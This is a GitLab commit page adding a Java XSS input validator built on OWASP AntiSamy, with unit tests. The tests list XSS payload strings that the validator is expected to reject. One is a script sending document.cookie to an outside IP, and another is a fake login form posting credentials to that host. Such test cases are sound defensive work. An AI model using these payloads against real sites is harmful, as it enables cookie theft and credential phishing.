Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
I
ioc_sixiang_license
Project
Project
Details
Activity
Releases
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
zengtianlai3
ioc_sixiang_license
Commits
fef5ddec
Commit
fef5ddec
authored
Jul 16, 2022
by
zengtianlai3
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
xss demo
parent
08a02601
Changes
5
Hide whitespace changes
Inline
Side-by-side
Showing
5 changed files
with
247 additions
and
0 deletions
+247
-0
Length.java
.../src/main/java/iot/sixiang/license/validation/Length.java
+38
-0
MainTest.java
...rc/main/java/iot/sixiang/license/validation/MainTest.java
+25
-0
NoXss.java
...e/src/main/java/iot/sixiang/license/validation/NoXss.java
+34
-0
NoXssValidator.java
...n/java/iot/sixiang/license/validation/NoXssValidator.java
+88
-0
NoXssValidatorTest.java
...va/iot/sixiang/license/validation/NoXssValidatorTest.java
+62
-0
No files found.
license/src/main/java/iot/sixiang/license/validation/Length.java
0 → 100644
View file @
fef5ddec
/**
* Copyright © 2016-2022 The Thingsboard Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
javax.validation.Constraint
;
import
javax.validation.Payload
;
import
java.lang.annotation.ElementType
;
import
java.lang.annotation.Retention
;
import
java.lang.annotation.RetentionPolicy
;
import
java.lang.annotation.Target
;
@Retention
(
RetentionPolicy
.
RUNTIME
)
@Target
(
ElementType
.
FIELD
)
@Constraint
(
validatedBy
=
{})
public
@interface
Length
{
String
message
()
default
"length of {fieldName} must be equal or less than {max}"
;
String
fieldName
();
int
max
()
default
255
;
Class
<?>[]
groups
()
default
{};
Class
<?
extends
Payload
>[]
payload
()
default
{};
}
license/src/main/java/iot/sixiang/license/validation/MainTest.java
0 → 100644
View file @
fef5ddec
package
iot
.
sixiang
.
license
.
validation
;
import
javax.validation.ConstraintValidatorContext
;
import
static
org
.
junit
.
jupiter
.
api
.
Assertions
.
assertFalse
;
import
static
org
.
mockito
.
Mockito
.
mock
;
/**
* Title: MainTest
* Description: TODO
*
* @author tianlai3
* @date 2022-07-17 00:33:08
*/
public
class
MainTest
{
public
static
void
main
(
String
[]
args
)
{
NoXssValidator
validator
;
validator
=
new
NoXssValidator
();
validator
.
initialize
(
null
);
String
stringWithXss
=
"aboba<a href='a' onmouseover=alert(1337) style='font-size:500px'>666"
;
boolean
isValid
=
validator
.
isValid
(
stringWithXss
,
mock
(
ConstraintValidatorContext
.
class
));
System
.
out
.
println
(
isValid
);
assertFalse
(
isValid
);
}
}
license/src/main/java/iot/sixiang/license/validation/NoXss.java
0 → 100644
View file @
fef5ddec
/**
* Copyright © 2016-2022 The Thingsboard Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
javax.validation.Constraint
;
import
javax.validation.Payload
;
import
java.lang.annotation.ElementType
;
import
java.lang.annotation.Retention
;
import
java.lang.annotation.RetentionPolicy
;
import
java.lang.annotation.Target
;
@Retention
(
RetentionPolicy
.
RUNTIME
)
@Target
(
ElementType
.
FIELD
)
@Constraint
(
validatedBy
=
{})
public
@interface
NoXss
{
String
message
()
default
"field value is malformed"
;
Class
<?>[]
groups
()
default
{};
Class
<?
extends
Payload
>[]
payload
()
default
{};
}
license/src/main/java/iot/sixiang/license/validation/NoXssValidator.java
0 → 100644
View file @
fef5ddec
/**
* Copyright © 2016-2022 The Thingsboard Authors
* <p>
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* <p>
* http://www.apache.org/licenses/LICENSE-2.0
* <p>
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
lombok.extern.slf4j.Slf4j
;
import
org.owasp.validator.html.AntiSamy
;
import
org.owasp.validator.html.Policy
;
import
org.owasp.validator.html.PolicyException
;
import
org.owasp.validator.html.ScanException
;
import
javax.validation.ConstraintValidator
;
import
javax.validation.ConstraintValidatorContext
;
import
java.io.UnsupportedEncodingException
;
import
java.net.URLDecoder
;
import
java.util.Objects
;
@Slf4j
public
class
NoXssValidator
implements
ConstraintValidator
<
NoXss
,
Object
>
{
private
static
final
AntiSamy
xssChecker
=
new
AntiSamy
();
private
static
Policy
xssPolicy
;
@Override
public
void
initialize
(
NoXss
constraintAnnotation
)
{
log
.
info
(
"1 {}"
,
getClass
());
log
.
info
(
"2 {}"
,
getClass
().
getClassLoader
());
log
.
info
(
"xss-policy1 {}"
,
getClass
().
getClassLoader
().
getResourceAsStream
(
"src/main/resources/xss-policy.xml"
));
log
.
info
(
"xss-policy2 {}"
,
getClass
().
getClassLoader
().
getResourceAsStream
(
"xss-policy.xml"
));
String
antiSamyPath
=
Objects
.
requireNonNull
(
NoXssValidator
.
class
.
getClassLoader
().
getResource
(
"antisamy-ebay.xml"
)).
getFile
();
if
(
xssPolicy
==
null
)
{
// 获取的文件路径中有空格时,空格会被替换为%20,在new一个File对象时会出现找不到路径的错误
// 对路径进行解码以解决该问题
try
{
antiSamyPath
=
URLDecoder
.
decode
(
antiSamyPath
,
"utf-8"
);
}
catch
(
UnsupportedEncodingException
e
)
{
log
.
warn
(
e
.
getMessage
());
}
log
.
info
(
antiSamyPath
);
// 指定策略文件
try
{
xssPolicy
=
Policy
.
getInstance
(
antiSamyPath
);
}
catch
(
PolicyException
e
)
{
log
.
warn
(
e
.
getMessage
());
}
// xssPolicy = Optional.ofNullable(getClass().getClassLoader().getResource(antiSamyPath))
//// xssPolicy = Optional.ofNullable(getClass().getClassLoader().getResource("xss-policy.xml"))
//// xssPolicy = Optional.ofNullable(getClass().getClassLoader().getResourceAsStream("xss-policy.xml"))
// .map(inputStream -> {
// try {
// return Policy.getInstance(inputStream);
// } catch (Exception e) {
// throw new RuntimeException(e);
// }
// })
// .orElseThrow(() -> new IllegalStateException("XSS policy file not found"));
}
}
@Override
public
boolean
isValid
(
Object
value
,
ConstraintValidatorContext
constraintValidatorContext
)
{
if
(!(
value
instanceof
String
)
||
((
String
)
value
).
isEmpty
())
{
return
true
;
}
try
{
return
xssChecker
.
scan
((
String
)
value
,
xssPolicy
).
getNumberOfErrors
()
==
0
;
}
catch
(
ScanException
|
PolicyException
e
)
{
return
false
;
}
}
}
license/src/main/java/iot/sixiang/license/validation/NoXssValidatorTest.java
0 → 100644
View file @
fef5ddec
/**
* Copyright © 2016-2022 The Thingsboard Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package
iot
.
sixiang
.
license
.
validation
;
import
org.junit.jupiter.api.BeforeAll
;
import
org.junit.jupiter.api.Test
;
import
org.junit.jupiter.params.ParameterizedTest
;
import
org.junit.jupiter.params.provider.ValueSource
;
import
javax.validation.ConstraintValidatorContext
;
import
static
org
.
junit
.
jupiter
.
api
.
Assertions
.
assertFalse
;
import
static
org
.
mockito
.
Mockito
.
mock
;
public
class
NoXssValidatorTest
{
private
static
NoXssValidator
validator
;
@BeforeAll
public
static
void
beforeAll
()
{
validator
=
new
NoXssValidator
();
validator
.
initialize
(
null
);
}
@ParameterizedTest
@ValueSource
(
strings
=
{
"aboba<a href='a' onmouseover=alert(1337) style='font-size:500px'>666"
,
"9090<body onload=alert('xsssss')>90909"
,
"qwerty<script>new Image().src=\"http://192.168.149.128/bogus.php?output=\"+document.cookie;</script>yyy"
,
"bambam<script>alert(document.cookie)</script>"
,
"<p><a href=\"http://htmlbook.ru/example/knob.html\">Link!!!</a></p>1221"
,
"<h3>Please log in to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type=\"username\" name=\"username\"></br>Password:<br><input type=\"password\" name=\"password\"></br><br><input type=\"submit\" value=\"Log in\"></br>"
,
" <img src= \"http://site.com/\" > "
,
"123 <input type=text value=a onfocus=alert(1337) AUTOFOCUS>bebe"
,
})
public
void
testIsNotValid
(
String
stringWithXss
)
{
boolean
isValid
=
validator
.
isValid
(
stringWithXss
,
mock
(
ConstraintValidatorContext
.
class
));
System
.
out
.
println
(
isValid
);
assertFalse
(
isValid
);
}
@Test
public
void
test1
(){
String
stringWithXss
=
"aboba<a href='a' onmouseover=alert(1337) style='font-size:500px'>666"
;
boolean
isValid
=
validator
.
isValid
(
stringWithXss
,
mock
(
ConstraintValidatorContext
.
class
));
System
.
out
.
println
(
isValid
);
assertFalse
(
isValid
);
}
}
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment